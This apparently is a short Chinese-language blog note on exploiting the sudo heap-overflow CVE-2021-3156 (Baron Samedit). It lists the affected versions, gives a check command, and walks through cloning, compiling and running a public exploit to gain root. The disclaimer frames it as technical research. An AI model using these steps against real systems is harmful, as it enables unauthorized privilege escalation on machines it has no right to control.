6Jyc5p+a

MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究，请勿非法破坏，请遵守相关法律法规，后果自负

【笔记】CVE-2021-3156漏洞利用

发表于 2024-08-08 更新于 2026-04-30 阅读次数：

前言

通过blasty/CVE-2021-3156实现Linux利用sudo提权

漏洞利用前提

1.8.2 <= sudo <= 1.8.31p2
1.9.0 <= sudo <= 1.9.5p1

poc

1	sudoedit -s /

如果报错，说明存在漏洞

下载项目

1 2	git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156

编译

make

漏洞利用

查看可以使用的脚本编号

1	./sudo-hax-me-a-sandwich

根据脚本编号选择脚本进行漏洞利用

<num>：脚本编号

1	./sudo-hax-me-a-sandwich <num>

完成

Mastodon Comments
twikoo

0%